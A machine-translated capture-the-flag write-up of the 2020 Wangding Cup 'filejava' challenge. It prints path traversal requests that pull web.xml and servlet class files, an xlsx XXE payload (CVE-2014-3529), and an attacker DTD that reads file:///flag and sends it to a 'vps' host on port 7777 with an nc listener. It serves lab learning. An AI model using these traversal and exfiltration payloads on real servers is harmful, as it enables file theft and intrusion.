[WANGDING cup 2020 Qinglong group]

Sk1y 2022-01-26 12:22:55 阅读数:353

wangding cup qinglong group

[ WANGDING cup 2020 Qinglong formation ]filejava


Knowledge point :web.xml Document leakage , blind xxe

The problem solving process

Open the container , We need to upload files

image-20211214110705051

First upload a file , Capture packets when downloading

image-20211214110908655

Get download path , You can try to read web.xml

/DownloadServlet?filename=../../../web.xml

perhaps

/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

image-20211214111746161

Then go and download all these things

DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class

And then use jd-jui Tools for decompilation , Tools download link :Free Download JD-GUI for Windows Latest Version (apponic.com)

image-20211214093357823

Pay attention to the key points ,excel and xxe A combination of vulnerabilities ,CVE-2014-3529

Create a new name for excel-sk1y.xlsx file , Unzip it

image-20211214103008637

And then modify [Content_Types].xml, Add... On its second line

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://vps/file.dtd"> %remote;%int;%send; ]>

Then compress it into excel-sk1y.xlsx

among vps For personal public network server ip, The effect is

image-20211214104357051

stay vps Upper web root directory ( It's usually /var/www/html/) Add file.dtd file , The content is

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://vps:7777?p=%file;'>">

monitor vps Of 7777 port ,

nc -lvp 7777

Then upload the excel-sk1y.xlsx, have to flag

image-20211214104634362

Reference link

  1. [ WANGDING cup 2020 Qinglong formation ]web
  2. The prophet community —— In depth understanding of xxe Loophole
copyright:author[Sk1y],Please bring the original link to reprint, thank you. https://en.javamana.com/2022/01/202201261222535413.html